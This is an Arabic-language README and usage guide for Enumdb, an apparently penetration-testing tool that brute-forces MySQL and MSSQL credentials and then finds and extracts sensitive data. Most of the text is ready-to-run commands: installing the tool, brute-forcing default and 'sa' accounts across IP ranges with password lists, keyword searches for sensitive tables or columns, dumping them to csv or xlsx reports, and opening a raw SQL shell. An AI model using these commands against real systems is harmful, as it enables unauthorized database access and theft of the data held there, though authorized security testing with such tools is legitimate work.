
أداة هجوم القوة العمياء واستغلال ما بعد الاختراق لقاعدة البيانات العلائقية لـ MySQL و MSSQL
Enumdb هي أداة للهجوم القسري واستغلال ما بعد الاختراق لقواعد البيانات العلائقية لأنظمة MySQL و MSSQL. عند تقديم قائمة بأسماء المستخدمين و/أو كلمات المرور، ستتنقل الأداة عبر كل مضيف بحثًا عن بيانات اعتماد صالحة. افتراضيًا، ستستخدم enumdb بيانات الاعتماد المكتشفة حديثًا للبحث تلقائيًا عن حقول البيانات الحساسة عبر عمليات بحث بالكلمات المفتاحية على أسماء الجداول أو الأعمدة. يمكن بعد ذلك استخراج هذه المعلومات وإخراجها إلى ملف .csv أو .xlsx.
الإضافات الحديثة:
-r csv أو -r xlsx مطلوب لاستخراج البيانات.-v).يمكن تعديل عدد الصفوف المستخرجة، وقواعد البيانات والجداول المدرجة في القائمة السوداء، وعمليات البحث بالكلمات المفتاحية في: enumdb/config.py.
تم تصميم واختبار Enumdb باستخدام Python3 على أنظمة لينكس المستندة إلى Debian (kali). ومع ذلك، فإن الأداة متوافقة أيضًا مع Python2.7 وتوزيعات لينكس الأخرى.
git clone https://github.com/m8r0wn/enumdb
cd enumdb
python3 setup.py install
الاتصال بقاعدة بيانات MySQL والبحث عن كلمات مفتاحية في أسماء الجداول (بدون تقرير)
enumdb -u root -p 'password123' -t mysql 10.11.1.30
الاتصال بقاعدة بيانات MSSQL باستخدام بيانات اعتماد المجال، والبحث عن البيانات باستخدام كلمات مفتاحية في أسماء الأعمدة، واستخراجها إلى تقرير .xlsx:
enumdb -u 'domain\\user' -p Winter2018! -t mssql -columns -report xlsx 10.11.1.30
الهجوم القسري على خوادم MySQL متعددة بحثًا عن بيانات اعتماد افتراضية (بدون تعداد بيانات أو جداول)
enumdb -u root -p '' -t mysql --brute 10.11.1.0-30
الهجوم القسري على حساب sa الخاص بـ MSSQL. بمجرد العثور على بيانات اعتماد صالحة، تعداد البيانات حسب اسم الجدول مع كتابة المخرجات إلى تقرير .csv:
enumdb -u sa -P passwords.txt -t mssql -columns -report xlsx 192.168.10.10
تشغيل SQL شِل على النظام:
enumdb -u sa -P 'P@ssword1' -t mssql --shell 192.168.10.10
optional arguments:
-h, --help show this help message and exit
-T MAX_THREADS Max threads (Default: 10)
-v Verbose output
Connection:
-port PORT Specify non-standard port
-t {mysql,mssql} Database type
target Target database server(s) [Positional]
Authentication:
-u USERS Single username
-U USERS Users.txt file
-p PASSWORDS Single password
-P PASSWORDS Password.txt file
Enumeration:
-c, --columns Search for key words in column names (Default: table names)
-r {none,csv,xlsx} Extract data and create output report
Additional Actions:
--brute Brute force only (No DB Enumeration)
--shell Launch SQL Shell
enumdb#> help
...
edb_databases - list all databases
edb_tables [DB] - list tables in DB
edb_columns [table].[DB] - list columns in table
edb_dump [table].[DB] [#rows] - Get data from table
[SQL Query] - Execute raw SQL query
إذا واجهت مشكلات مع MySQLdb، فقد تكون هناك حاجة إلى موارد تطوير MySQL إضافية:
sudo apt-get install python3-dev default-libmysqlclient-dev build-essential
sudo yum install python3-devel mysql-devel